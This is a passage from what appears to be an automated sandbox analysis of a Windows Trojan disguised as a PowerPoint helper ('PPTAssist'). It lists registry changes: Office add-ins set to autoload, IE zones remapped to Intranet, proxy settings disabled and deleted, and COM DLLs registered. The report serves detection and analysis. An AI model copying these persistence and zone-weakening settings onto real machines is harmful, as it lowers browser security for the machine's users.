"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E A5 5E 95 45 54 1E 37 10 8B 3A 1F 7F B5 05 A7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Internet Explorer]
"iexplore.exe" = "Internet Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process OfficeAssist.0419.80.1123.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayName" = "PPT美化大师"

[HKCU\Software\PPTAssist\Common]
"infoGUID" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\PPTAssist\Common\Setting]
"HideExcelPane" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist]
"assistupdate.exe" = "PPT美化大师"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"Publisher" = "珠海金山办公软件有限公司"

[HKCU\Software\PPTAssist\Common]
"DistSrc" = "80.1123"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"LocationRoot" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayVersion" = "1.0.0.0419"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\pptassist\~21d1e5\install_res\1.png,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\PPTAssist\Common\Setting]
"HidePowerPntPane" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542]
"OfficeAssist.0419.80.1123.exe" = "1"

[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"Version" = "2.5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe"

[HKCU\Software\PPTAssist\Common\Setting]
"HideWordPane" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 01 11 EA 39 04 7C C5 5F 78 10 78 B4 DA 80 18"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\HELPDIR]
"(Default)" = "%Program Files%\Common Files\Microsoft Shared\OFFICE14"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist]
"notify.exe" = "PPT Assist Expansion tool"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\PPTAssist\Common]
"Version" = "1.0.0.0419"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"(Default)" = "{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process OfficeAssist.0419.80.1123.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C AC 34 08 E8 A4 9C 69 66 D5 4C 77 7C D3 8D D2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process regsvr32.exe:2136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"

[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"

[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"

[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 98 28 95 58 44 3E 4B C5 13 C2 2B D5 E1 01 09"

[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"

The process regsvr32.exe:2716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F AA 29 AE 0B B0 15 0B DB 79 47 BC 79 F8 93 9F"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"

[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"

[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"

[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"

The process regsvr32.exe:1280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\PPTAssist.Addins]
"(Default)" = "PPTAssist Class"

[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Classes\PPTAssist.Addins\CLSID]
"(Default)" = "{034DF736-A378-4292-ACAE-A561088999F5}"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Version]
"(Default)" = "1.0"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"

[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\ProgID]
"(Default)" = "PPTAssist.Control.1"

[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist"

[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Classes\PPTAssist.Control.1\CLSID]
"(Default)" = "{1077138E-896C-445E-BD31-CFCFFA4636C4}"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Classes\PPTAssist.Addins.1\CLSID]
"(Default)" = "{034DF736-A378-4292-ACAE-A561088999F5}"

[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"

[HKCU\Software\Classes\PPTAssist.Control]
"(Default)" = "PPTAssistControl Class"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0]
"(Default)" = "PPTAssist 1.0 ÀàÐÍ¿â"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\VersionIndependentProgID]
"(Default)" = "PPTAssist.Addins"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\ProgID]
"(Default)" = "PPTAssist.Addins.1"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}]
"(Default)" = "IRibbonCallback"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"

[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"

[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\PPTAssist.Addins.1]
"(Default)" = "PPTAssist Class"

[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}]
"(Default)" = "PPTAssist Class"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 B1 53 ED 4F BB 45 4B EF 51 8F C1 FF E7 FE 4A"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Classes\PPTAssist.Addins\CurVer]
"(Default)" = "PPTAssist.Addins.1"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}]
"(Default)" = "IWpsAssistControl"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}]
"(Default)" = "PPTAssistControl Class"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\VersionIndependentProgID]
"(Default)" = "PPTAssist.Control"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"

[HKCU\Software\Classes\PPTAssist.Control\CLSID]
"(Default)" = "{1077138E-896C-445E-BD31-CFCFFA4636C4}"

[HKCU\Software\Classes\PPTAssist.Control.1]
"(Default)" = "PPTAssistControl Class"

[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Classes\PPTAssist.Control\CurVer]
"(Default)" = "PPTAssist.Control.1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Programmable]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\ProgID]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\TypeLib]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\TypeLib]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\ProgID]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Version]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\Programmable]

The process regsvr32.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 7B 80 77 94 5C 96 B6 EE D3 E5 42 32 1B AB 6B"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
